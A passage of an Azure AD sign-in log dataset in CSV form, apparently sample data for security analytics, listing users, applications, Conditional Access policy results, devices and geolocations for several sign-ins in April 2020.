'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ce13c11700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5f11d930-41ca-43a7-b362-f3ce13c11700,SigninLogs,Sucess,33.0175209,35.44601059
+1662,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:33.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:33,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",1876eddf-482a-4dc9-a9d6-7c1be8015100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,1876eddf-482a-4dc9-a9d6-7c1be8015100,SigninLogs,Sucess,35.01296997,-80.93171692
+1663,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:30.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,423a1899-ab9c-41be-89ff-a4277ae6dc26,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-104280a91700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,6c1d2f35-9fdd-4afe-865b-104280a91700,SigninLogs,Sucess,41.90428925,-85.99833679
+1664,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,edccb67a-48c2-41a2-936d-39059c58cbcd,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ec85dd07-c5e8-494c-aa5b-3f84e4081900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f84e4081900,SigninLogs,Sucess,36.6404686,-78.26995087
+1665,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:10.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,fb8d9af1-13b4-4b76-85cc-310d7038453f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1fc6d415-116e-44c9-a4fc-b8ef7d6f1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1fc6d415-116e-44c9-a4fc-b8ef7d6f1700,SigninLogs,Sucess,41.90428925,-85.99833679
+1666,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:06.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:22,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",fd7d50db-5207-4a08-83a9-795881934700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fd7d50db-5207-4a08-83a9-795881934700,SigninLogs,Sucess,40.75891113,-73.97901917
+1667,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,edccb67a-48c2-41a2-936d-39059c58cbcd,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ec85dd07-c5e8-494c-aa5b-3f84e4081900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f84e4081900,SigninLogs,Sucess,36.6404686,-78.26995087
+1668,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:11.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7b693c2b-4c01-4081-829d-ec0b9e9408b7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3108dc47-edad-48bc-88bb-75ce46cd0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3108dc47-edad-48bc-88bb-75ce46cd0f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1669,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': 